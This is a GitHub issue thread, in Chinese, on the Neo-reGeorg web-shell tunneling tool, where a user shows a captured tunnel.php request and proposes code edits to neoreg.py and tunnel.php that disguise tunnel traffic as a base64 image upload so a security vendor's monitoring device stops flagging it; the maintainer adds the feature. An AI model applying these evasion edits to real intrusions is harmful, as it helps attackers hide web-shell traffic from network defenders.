search

L-codes / Neo-reGeorg

Neo-reGeorg is a project that seeks to aggressively refactor reGeorg
GNU General Public License v3.0
2.84k stars 439 forks source link

请求加上POST伪装功能 #84

Closed ddwpwop closed 1 year ago

ddwpwop commented 1 year ago

通过抓包发现现在的数据包如下:

POST /tunnel.php HTTP/1.1
Host: 127.0.0.1:89
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=vhecp7urk9qhrhja3v8gilvci2;
Content-type: application/octet-stream
Content-Length: 819

dsE1sXBpvBaQ6T+UXcnX2NW6ESXhE+iLXcnXyEIRiRPYfGX6EcdJbcPEfEyhXcnegFh6EFi9/1bFzKvSzUvrYsd9jVbEEU5Q/7NxU+Pgn1i3uLNOxOyr/7dCMcZyHimkfqxSnlFhW2fCXLZ9cRw3YRQaDj5F/7d9kV9QMca9cGSCXq99BL92q0DmkjhhnshaWfXSD+I8XU5FM0nCM0D9kNIufNFM/UhaYRISuNXSD2IgkjhLYsAgzREgxLMCMUyOM0E1/79QuVxPWKVOYj5FM0nCM0DxU+V7D2frXUFVzKxgWGSCW0Z9W188nUr9WGfKzGVmWimkiRx7WqhmHldp/OZxU+xgzKvSD1b8z2y3uGxaz1xSLi8Lz2wJYRE3uVhuEVxVEFxAbLF2YGf7nLXFnKavnRPOYG8PM1DyW2SaXKx8M7axU+xgzobSzoiIXsSrWcZ9DqhrzGS7Dqb8z2ygz2xmWqiIn1bOWRVILi8Lz2vmWRvm/EQSzKXmYLZ9McEFLiZxUKSIW0F+DqbPHKSIDRXS/1hCW0IlDqxSx7iaWsxVMqxDxcA1W0WlBKXuDFSFMEVmfs8PM7ShboPbMRWVk2WZDKbyboPbMfhNWKb6jVAbRq8jER88MRWx/mWDEEF6RNWyEcVjc1XCfq8sbcmKYRiwM7MvMciOMciKY2S+6RV7WLP+WRN0W7uQM7MQMOWmYRFS6cNFHLuOHcNOMciOA1E1sXZGvYcH3JjJE0+=

这种数据包容易被判定为恶意流量,因为哥斯拉的请求也是类似。 所以我建议增加伪装的POST请求参数,假设如下:

POST /tunnel.php HTTP/1.1
Host: 127.0.0.1:89
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=vhecp7urk9qhrhja3v8gilvci2;
Content-type: application/octet-stream
Content-Length: 819

img=data:image/png;base64,dsE1sXBpvBaQ6T+UXcnX2NW6ESXhE+iLXcnXyEIRiRPYfGX6EcdJbcPEfEyhXcnegFh6EFi9/1bFzKvSzUvrYsd9jVbEEU5Q/7NxU+Pgn1i3uLNOxOyr/7dCMcZyHimkfqxSnlFhW2fCXLZ9cRw3YRQaDj5F/7d9kV9QMca9cGSCXq99BL92q0DmkjhhnshaWfXSD+I8XU5FM0nCM0D9kNIufNFM/UhaYRISuNXSD2IgkjhLYsAgzREgxLMCMUyOM0E1/79QuVxPWKVOYj5FM0nCM0DxU+V7D2frXUFVzKxgWGSCW0Z9W188nUr9WGfKzGVmWimkiRx7WqhmHldp/OZxU+xgzKvSD1b8z2y3uGxaz1xSLi8Lz2wJYRE3uVhuEVxVEFxAbLF2YGf7nLXFnKavnRPOYG8PM1DyW2SaXKx8M7axU+xgzobSzoiIXsSrWcZ9DqhrzGS7Dqb8z2ygz2xmWqiIn1bOWRVILi8Lz2vmWRvm/EQSzKXmYLZ9McEFLiZxUKSIW0F+DqbPHKSIDRXS/1hCW0IlDqxSx7iaWsxVMqxDxcA1W0WlBKXuDFSFMEVmfs8PM7ShboPbMRWVk2WZDKbyboPbMfhNWKb6jVAbRq8jER88MRWx/mWDEEF6RNWyEcVjc1XCfq8sbcmKYRiwM7MvMciOMciKY2S+6RV7WLP+WRN0W7uQM7MQMOWmYRFS6cNFHLuOHcNOMciOA1E1sXZGvYcH3JjJE0+=&id=23914214&kid=acd8dea3f212313&time=1188271471

主要通过简单修改neoreg.py 417行和 604行

417 data = 'img=data:image/png;base64,'+encode_body(info)+'&id=23914214&kid=acd8dea3f212313&time=1188271471'

604 data = 'img=data:image/png;base64,'+encode_body(info)+'&id=23914214&kid=acd8dea3f212313&time=1188271471'

修改tunnel.php 119行,增加

$post_data = str_replace('img=data:image/png;base64,', '', $post_data);
$post_data = str_replace('&id=23914214&kid=acd8dea3f212313&time=1188271471', '', $post_data);

修改完成后即可,看起来的数据包像是一个正常的POST功能。但由于个人能力有限,我只会简单修改PHP的tunnel.php,其它net和java类的不会修改,希望作者大佬可以考虑加入自定义功能,可以增加一个类似sqlmap的prefix和suffix选项,来伪装POST输入自定义字符。

L-codes commented 1 year ago

确实目前没有request的请求伪造,只有response的伪造,等我有空考虑弄上,因为目前编码后的body,暂未发现有设备能标记,请问是什么设备将数据包判定为恶意流量

ddwpwop commented 1 year ago

某厂商的态势感知设备,只要通信就会告警

L-codes commented 1 year ago

某厂商的态势感知设备,只要通信就会告警

这样误报避免太多了吧。。。

L-codes commented 1 year ago

5.1.0 版本中新增该需求功能了 :)